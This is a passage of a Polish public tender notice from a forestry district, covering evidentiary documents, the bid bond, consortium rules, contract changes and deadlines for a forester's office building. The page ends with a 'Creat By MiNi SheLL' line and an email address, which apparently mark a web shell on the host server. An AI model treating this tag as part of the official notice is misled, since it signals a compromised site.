terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;4)zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej<br/>Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki<br/>terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego,że Wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie<br/>art.109ust.1pkt1PZP,wystawionego nie wcześniej niż3miesiące przed jego złożeniem,a w przypadku<br/>zalegania z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem<br/>albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających,że przed upływem<br/>terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne<br/>lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności,5)odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej,w zakresie art.109ust.1pkt4)PZP,sporządzonych nie wcześniej<br/>niż3miesiące przed jej złożeniem,jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji,6)oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu,o którym<br/>mowa w art.125ust.1PZP(oświadczenie o braku podstaw do wykluczenia,sporządzone wg zał.nr3B do<br/>SWZ),w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego,o których<br/>mowa w:a)art.108ust.1pkt3PZP,b)art.108ust.1pkt4PZP,dot.orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka zapobiegawczego,c)art.108ust.1pkt5PZP,dotyczących zawarcia<br/>z innymi wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,d)art.108ust.1pkt6PZP,e)art.109ust.1pkt1PZP,odnośnie do naruszenia obowiązków<br/>dotyczących płatności podatków i opłat lokalnych,o których mowa w ustawie z dn.12.01.1991r.o<br/>podatkach i opłatach lokalnych(tekst jedn.Dz.U.z2019r.,poz.1170 z<br/>późn.zm.),f)art.109ust.8i10PZP.Wykonawca w trybie art.274ust.1PZP zostanie wezwany do złożenia<br/>dokumentów,o których mowa wyżej w pkt1),3)-6)dot. podmiotu udostępniającego Wykonawcy zasoby,<br/>na zasadach określonych w art.118PZP(o ile Wykonawca polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej tych podmiotów.Jeżeli Wykonawca ma siedzibę<br/>lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast dokumentów wskazanych<br/>wyżej w pkt1),3)-5)składa dokumenty zgodnie z wymaganiami opisanymi w pkt9.5-9.7SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o<br/>których mowa w pkt 7.1. SWZ Zamawiający działając na podstawie art. 274 ust. 1 PZP wezwie<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania,<br/>aktualnych na dzień złożenia następujących podmiotowych środków dowodowych: 1) informacji banku<br/>lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej<br/>złożeniem, Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez<br/>Zamawiającego podmiotowych środków dowodowych, o których mowa wyżej w pkt 1), Wykonawca<br/>składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie<br/>opisanego przez Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej<br/>lub finansowej; 2) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych<br/>wspólnie z innymi Wykonawcami wykaz, o którym mowa wyżej dotyczy robót budowlanych, w których<br/>wykonaniu Wykonawca ten bezpośrednio uczestniczył. Okres wyrażony w latach, o którym mowa<br/>wyżej, liczy się wstecz od dnia w którym upływa termin składnia ofert (wzór wykazu robót budowlanych<br/>stanowi załącznik nr 7 do SWZ); 3) dowodów określających, że wskazane przez Wykonawcę roboty<br/>budowlane na potwierdzenie spełnienia warunku udziału w postępowaniu dot. zdolności technicznej<br/>lub zawodowej w zakresie doświadczenia zostały wykonane należycie. Dowodami, o których mowa<br/>wyżej, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty; 4) wykazu osób, skierowanych przez<br/>Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień (numer<br/>oraz zakres uprawnień zapewniających prawo wykonywania samodzielnych funkcji technicznych w<br/>budownictwie, z podaniem daty i pełnej podstawy prawnej ich wydania) niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości: 5 900,00 zł (słownie złotych: pięć<br/>tysięcy dziewięćset 00/100 PLN). Wadium należy wnieść przed upływem terminu składania ofert<br/>i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków,<br/>o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP. 2. Wadium może być wnoszone<br/>według wyboru Wykonawcy w jednej lub kilku następujących formach:1) pieniądzu, 2)<br/>gwarancjach bankowych, 3) gwarancjach ubezpieczeniowych, 4) poręczeniach udzielonych<br/>przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r., poz. 299).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w banku BNP Paribas Bank Polska SA nr rachunku: 85 2030 0045 1110 0000<br/>0038 7060 z dopiskiem: „wadium na zabezpieczenie oferty w postępowaniu pn. „Budowa<br/>samodzielnej kancelarii leśniczego w Leśnictwie Otanów wraz z niezbędną infrastrukturą techniczną i zagospodarowaniem terenu na działce o nr ewid. 63/14, 245/3, gmina Myślibórz,<br/>obręb Otanów” III postępowanie. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w<br/>podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium<br/>wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 4. Z treści wadium<br/>wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach<br/>udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada<br/>2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać<br/>bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP. 5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa wyżej w pkt 2. ppkt 2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego<br/>wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta<br/>Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie<br/>będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek<br/>o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z<br/>postępowania na podstawie art. 226 ust. 1 pkt 14 PZP w zw. z art. 266 PZP. 6. Treść gwarancji<br/>wadialnej musi zawierać następujące elementy: 1) nazwę dającego zlecenie (Wykonawcy),<br/>beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji<br/>ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib, 2) określenie<br/>wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu<br/>zamówienia, 3) kwotę gwarancji/poręczenia, 4) zobowiązanie gwaranta/poręczyciela do<br/>zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne<br/>żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP. 7. Zamawiający<br/>zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać<br/>umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa<br/>załączonego do oferty - treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) Oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. oświadczenie o spełnieniu warunków<br/>udziału w postępowaniu (wg wzoru stanowiącego załącznik nr 3A do SWZ) oraz oświadczenie o<br/>braku podstaw do wykluczenia (wg wzoru stanowiącego załącznik nr 3B do SWZ) składa każdy<br/>z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu. Oświadczenia Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, o których mowa wyżej powinny zostać złożone wraz z<br/>ofertą pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 9.3. obowiązany będzie złożyć każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy i wniesienie zabezpieczenia należytego<br/>wykonania umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania<br/>poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w<br/>całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia łącznie lub każdego z osobna.<br/>8) Na mocy art. 117 ust. 4 PZP, Wykonawcy będą zobowiązani złożyć wraz z ofertą<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy -<br/>oświadczenie takie należy złożyć w sytuacji gdy, stosownie do postanowień pkt 7.3.,<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą polegać na zdolnościach (w<br/>odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia) tych z<br/>Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane. Wzór stosownego oświadczenia został zawarty w treści formularza Oferty<br/>stanowiącego załącznik nr 1 SWZ i Zamawiający zaleca złożyć to oświadczenie właśnie w tym<br/>formularzu. Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 PZP odnosi się<br/>również do wykonawców, prowadzących działalność w formie spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian oraz warunki ich wprowadzenia szczegółowo zostały opisane w<br/>projektowanych postanowieniach umowy, które stanowią załącznik nr 4 do SWZ. 1.<br/>Zamawiający na podstawie art. 455 ust. 1 pkt 1 PZP, przewiduje możliwość dokonania<br/>następujących zmian Umowy: (1) w zakresie zmiany terminów realizacji poszczególnych robót<br/>określonych w Harmonogramie oraz Terminu Wykonania; (2)w zakresie zmiany kolejności<br/>wykonywania lub zmiany terminów wykonania poszczególnych świadczeń wchodzących w skład<br/>Przedmiotu Umowy w stosunku do terminów określonych w Harmonogramie, jednakże bez<br/>dokonywania zmiany Terminu Wykonania. (3) w zakresie zmiany sposobu wykonania<br/>Przedmiotu Umowy związanej z koniecznością zrealizowania Przedmiotu Umowy przy<br/>zastosowaniu innych rozwiązań technicznych lub technologicznych, w szczególności robót<br/>zamiennych, (4) W zakresie zmiany Wynagrodzenia, w przypadku, gdy zmiany, o których mowa<br/>w pkt (3) będą miały wpływ na koszty wykonania Przedmiotu Umowy przez Wykonawcę. 2.<br/>Inicjatorem zmian w Umowie może być każda ze Stron, z tym, że ostateczna decyzja, co do<br/>wprowadzenia zmian i ich zakresu należy do Zamawiającego. Wystąpienie którejkolwiek z<br/>okoliczności mogących powodować zmianę umowy, nie stanowi bezwzględnego zobowiązania<br/>Zamawiającego do dokonania zmian, ani nie może stanowić podstawy do jakichkolwiek<br/>roszczeń Wykonawcy do ich dokonania. 3. Niezależnie od postanowień niniejszego paragrafu,<br/>Strony dopuszczają możliwość (i) zmian redakcyjnych Umowy oraz (ii) zmian danych Stron<br/>ujawnionych w rejestrach publicznych, nie stanowiących zmiany, o której mowa w art. 455 ust. 1<br/>PZP. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy (SmartPZP) - https://portal.smartpzp.pl/nadlesnictwo_mysliborz, do dnia 23.09.2021 r., godz. 10:00.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-23 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com